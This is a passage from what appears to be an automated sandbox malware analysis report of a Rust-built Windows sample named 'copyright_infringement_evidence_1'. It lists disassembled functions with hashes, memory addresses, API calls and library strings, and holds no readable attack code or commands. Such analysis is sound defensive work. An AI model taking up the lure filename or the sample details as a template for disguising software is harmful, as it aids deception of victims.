                                                                                                          • Instruction Fuzzy Hash: C45138A2B08B8142FF10D755A4613BBE761E7893E4F84A135EE8D4BB5ADF6DD241CB00
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a94ed11d689e976df297b737176b85f7b4ad862b5656d10fc79295d4fa741392
                                                                                                          • Instruction ID: a62af94ff47793a4d9df61ca8e54426072d203bb44c898211345004d4a479407
                                                                                                          • Opcode Fuzzy Hash: a94ed11d689e976df297b737176b85f7b4ad862b5656d10fc79295d4fa741392
                                                                                                          • Instruction Fuzzy Hash: E0414972F0966542FB15CB92F664A78B611E364FE0F82A032DD1B23BA1CE78D955C380
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: bdcae8e6d7cb898060b82be125505d50ef0afc149d71bdf26dea84f4fbbf3f3b
                                                                                                          • Instruction ID: 402f639586b914fbdb5484adcb68c09556c3d2a1a75f9bdb4076bec7ebf6d061
                                                                                                          • Opcode Fuzzy Hash: bdcae8e6d7cb898060b82be125505d50ef0afc149d71bdf26dea84f4fbbf3f3b
                                                                                                          • Instruction Fuzzy Hash: 4031E8E6F08B8042FE44D7A9746637B9312A7857D0F80E236DD895BB1ADF2DC2524640
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 6f75519737384c2ef5be35f8588fc4440c10294aae4c90597aa54a03e42ac1a4
                                                                                                          • Instruction ID: 69315d763d41bb56fa857f964e62a48704abf20177fa4b8c1f2a3a0618601324
                                                                                                          • Opcode Fuzzy Hash: 6f75519737384c2ef5be35f8588fc4440c10294aae4c90597aa54a03e42ac1a4
                                                                                                          • Instruction Fuzzy Hash: AA31D8E6F08B8042FE44D7A8746637B9312AB853D0F80E236ED895AB1FDF2DD2524640
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: a14da3c01f72893653087f2132717353e9d331f37e01e423f584ede4058f638e
                                                                                                          • Instruction ID: 41c98ffbe975273aad9b20b4c6ca7c56e5f87735ad332d7a2277db0b5cc212a8
                                                                                                          • Opcode Fuzzy Hash: a14da3c01f72893653087f2132717353e9d331f37e01e423f584ede4058f638e
                                                                                                          • Instruction Fuzzy Hash: 2501A94780F7D646D3034B39086515D3F618B83D6C7AE83F7CBA89A1E7C95E285AC316
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 44fd2aa2344df9062ef93be2243988db38d459762e4a858535864337b122c6cb
                                                                                                          • Instruction ID: 27c00e421c4adacefd3a699a5bbb4c9179c677a83203b3f03644a2a081a61ff1
                                                                                                          • Opcode Fuzzy Hash: 44fd2aa2344df9062ef93be2243988db38d459762e4a858535864337b122c6cb
                                                                                                          • Instruction Fuzzy Hash: E9F0A04384F3C04BE3175E3418A90687FB0E682910BDE81F7C3E5872D3EA4C5859C792
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          • internal error: entered unreachable code/rustc/eeb90cda1969383f56a2637cbd3037bdf598841c\library\std\src\thread\mod.rs, xrefs: 00007FF7A17AC5BD
                                                                                                          • polled after completeC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-0.14.30\src\client\dispatch.rs, xrefs: 00007FF7A17AC58D, 00007FF7A17AC5A5
                                                                                                          • assertion failed: size <= proto::MAX_WINDOW_SIZEC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\h2-0.3.26\src\client.rs, xrefs: 00007FF7A17AC2F6
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID: assertion failed: size <= proto::MAX_WINDOW_SIZEC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\h2-0.3.26\src\client.rs$internal error: entered unreachable code/rustc/eeb90cda1969383f56a2637cbd3037bdf598841c\library\std\src\thread\mod.rs$polled after completeC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\hyper-0.14.30\src\client\dispatch.rs
                                                                                                          • API String ID: 2162964266-2939538541
                                                                                                          • Opcode ID: ed427af0311d9c803e3836b9bdc9d44593eec473a4fdc7f6880aac6f9d28fa4b
                                                                                                          • Instruction ID: 7bf08c583fe2b8260d6399c7d23159909acb4bf000424a877b888de7bd20ac30
                                                                                                          • Opcode Fuzzy Hash: ed427af0311d9c803e3836b9bdc9d44593eec473a4fdc7f6880aac6f9d28fa4b
                                                                                                          • Instruction Fuzzy Hash: 27F1A325A0E78191FB60AB14E4403B9E761FB887D4F959131DA8C07BB6DFBCE585CB20
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID: None$Some
                                                                                                          • API String ID: 2162964266-970715861
                                                                                                          • Opcode ID: bbabd8b5079f0c4a8fc44b9833f844a0f14c08f7fc0f7af6f5401ea5002976d4
                                                                                                          • Instruction ID: a4d23ed82198e86f5a9dc64cad000f070a96d05f7c1b355a34bb6858672e42cc
                                                                                                          • Opcode Fuzzy Hash: bbabd8b5079f0c4a8fc44b9833f844a0f14c08f7fc0f7af6f5401ea5002976d4
                                                                                                          • Instruction Fuzzy Hash: D041B321B1E68680FB20FB11E4446AAA760EB8A7E0F854171DA4D07BB6DF6CD165CF10
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          • use of std::thread::current() is not possible after the thread's local data has been destroyedlibrary\std\src\thread\mod.rs, xrefs: 00007FF7A189F20B, 00007FF7A189F3DA
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressErrorLastWait
                                                                                                          • String ID: use of std::thread::current() is not possible after the thread's local data has been destroyedlibrary\std\src\thread\mod.rs
                                                                                                          • API String ID: 1574541344-63010627
                                                                                                          • Opcode ID: bf62289f7fe402e094a5be9f3d15296bd48a8f775122f317df31ab3ab2bfd3bd
                                                                                                          • Instruction ID: 42e0c7fe9ee2305392c3ccc7c89c89158607d09bf0c3860ee3607e7e36025855
                                                                                                          • Opcode Fuzzy Hash: bf62289f7fe402e094a5be9f3d15296bd48a8f775122f317df31ab3ab2bfd3bd
                                                                                                          • Instruction Fuzzy Hash: 4D81F632A0AE8691FB15EB15DC402B9AB20FB44B74F854272ED1D577F0CE6CE566CB10
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove$memset
                                                                                                          • String ID: called `Result::unwrap()` on an `Err` value
                                                                                                          • API String ID: 3790616698-2333694755
                                                                                                          • Opcode ID: d3f4e95df58de4167fcf931a9aa84193366a87e0c25571709cb0b22dd6207500
                                                                                                          • Instruction ID: 6dfa5d114cf3ca9e387cbd2dbf501639dc29b17657ad0eb79d363cc88a2be07c
                                                                                                          • Opcode Fuzzy Hash: d3f4e95df58de4167fcf931a9aa84193366a87e0c25571709cb0b22dd6207500
                                                                                                          • Instruction Fuzzy Hash: 6412B52290EBC585FB61AB24E0003AAA7A0FB88754F859136DFCD437A6DF7CD155CB60
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memset
                                                                                                          • String ID: .0.-+NaNinf0assertion failed: buf.len() >= maxlen$assertion failed: !buf.is_empty()$assertion failed: buf[0] > b'0'$assertion failed: parts.len() >= 4
                                                                                                          • API String ID: 2221118986-2873543081
                                                                                                          • Opcode ID: 60599426b66270748d7e66a90ce40b012f1c9dc9e6e1d024f9a012e5292904ee
                                                                                                          • Instruction ID: 5c8032b861abc5617f217b49d5c5b952075b58a3ea0a7a3fac81cf7b51a156f5
                                                                                                          • Opcode Fuzzy Hash: 60599426b66270748d7e66a90ce40b012f1c9dc9e6e1d024f9a012e5292904ee
                                                                                                          • Instruction Fuzzy Hash: B2D123A2A0B79280FB14AB2198006B8E691FF54BE4FD28171DD1D073B1DFBCD566CB20
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: Dequeindices$StreamStreamId$internal error: entered unreachable code
                                                                                                          • API String ID: 0-2222713811
                                                                                                          • Opcode ID: e4cde704d0005f96a263286e9784ea2c39251fa37b4ee7a550703359974f5cd4
                                                                                                          • Instruction ID: 19915c71ef9356ffb9d5403998e7b12f5b96df6dc3ff8c0039fc5663734f8a0c
                                                                                                          • Opcode Fuzzy Hash: e4cde704d0005f96a263286e9784ea2c39251fa37b4ee7a550703359974f5cd4
                                                                                                          • Instruction Fuzzy Hash: 33E1F636609BC595E760DB00F4803EAB7A8F788B94F924176DA8C43B68DF7CD5A5CB10
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          • Writer must be presentC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\base64-0.21.7\src\write\encoder.rs, xrefs: 00007FF7A179D0F5
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID: Writer must be presentC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\base64-0.21.7\src\write\encoder.rs
                                                                                                          • API String ID: 2162964266-1658804345
                                                                                                          • Opcode ID: 2a9eef67fa7c71c77ccbe5f8e3124bb5e08258562da8c2cffb0e2afd7fa28d2d
                                                                                                          • Instruction ID: 90f7d8e8f678fc2c0d5c44707091afbbcea6803609730150a2e53a935414801d
                                                                                                          • Opcode Fuzzy Hash: 2a9eef67fa7c71c77ccbe5f8e3124bb5e08258562da8c2cffb0e2afd7fa28d2d
                                                                                                          • Instruction Fuzzy Hash: A371E1A2B0A78281FB44EB25D5043AA9755BB08BD4FC55031EF0D173A6CFBCE166C724
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$FileModuleName
                                                                                                          • String ID:
                                                                                                          • API String ID: 1026760046-0
                                                                                                          • Opcode ID: b270b8688aba55bf4d569a6d20a57d0efe1241b2417c858a766a53639744f277
                                                                                                          • Instruction ID: 5ae759c13087ca5b64d9cf973136472a58082c4c3ed61b7d6e69cdc2211e6dc3
                                                                                                          • Opcode Fuzzy Hash: b270b8688aba55bf4d569a6d20a57d0efe1241b2417c858a766a53639744f277
                                                                                                          • Instruction Fuzzy Hash: D2510522B07BC18AFB31AF21AD447E8A354BB04BF8FD64135DD1D467A5DEBCA2918710
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          • assertion failed: slot.next.is_none(), xrefs: 00007FF7A184ECCC
                                                                                                          • invalid keyC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\slab-0.4.9\src\lib.rsinternal error: entered unreachable code, xrefs: 00007FF7A184ECB4
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID: assertion failed: slot.next.is_none()$invalid keyC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\slab-0.4.9\src\lib.rsinternal error: entered unreachable code
                                                                                                          • API String ID: 2162964266-145416857
                                                                                                          • Opcode ID: 4ad4aab9a53b8d86d86ad5c21fbecdb18392af3a1d1ecee551a20f021c41c147
                                                                                                          • Instruction ID: fa680df296a24bdf0324d7780abef81ce6e515faad96d857209a6fbfd3883c75
                                                                                                          • Opcode Fuzzy Hash: 4ad4aab9a53b8d86d86ad5c21fbecdb18392af3a1d1ecee551a20f021c41c147
                                                                                                          • Instruction Fuzzy Hash: 7731803261BB8585F720AF01E4417A9B364FB44BA8F864172EE9C077A5DFBCD190CB10
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          • Chunkedstatechunk_lenextensions_cnt, xrefs: 00007FF7A181E610
                                                                                                          • Flatten polled after completionC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-util-0.3.30\src\future\future\flatten.rs, xrefs: 00007FF7A17BA306
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765353928.00007FF7A1984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_7ff7a1780000_copyright_infringement_evidence_1.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: memmove
                                                                                                          • String ID: Chunkedstatechunk_lenextensions_cnt$Flatten polled after completionC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-util-0.3.30\src\future\future\flatten.rs
                                                                                                          • API String ID: 2162964266-2529276332
                                                                                                          • Opcode ID: 1bff7e2527887d27a86b9e8506f3bac2d908252814f488a5a361f87c72eec005
                                                                                                          • Instruction ID: 157bf277c87c51ccc2c7c70e07170fdfcc67c43c63fe586e3f23eafcddb997f6
                                                                                                          • Opcode Fuzzy Hash: 1bff7e2527887d27a86b9e8506f3bac2d908252814f488a5a361f87c72eec005
                                                                                                          • Instruction Fuzzy Hash: E621C321B1E64291FB24FB02E8007F9A610BB56B94FC58071DE5E07BA2DFBCE159CB10
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          • invalid initial remote window sizeC:\Users\Administrator\.cargo\registry\src\index.crates.io-6f17d22bba15001f\h2-0.3.26\src\proto\streams\recv.rs, xrefs: 00007FF7A1833D09
                                                                                                          • called `Result::unwrap()` on an `Err` value, xrefs: 00007FF7A1833D3A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2764662915.00007FF7A1781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A1780000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2764606251.00007FF7A1780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765024695.00007FF7A18DA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765241074.00007FF7A1980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765270878.00007FF7A1981000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2765328336.00007FF7A1982000.00000004.00000001.01000000.00000003.sdmpDownload File
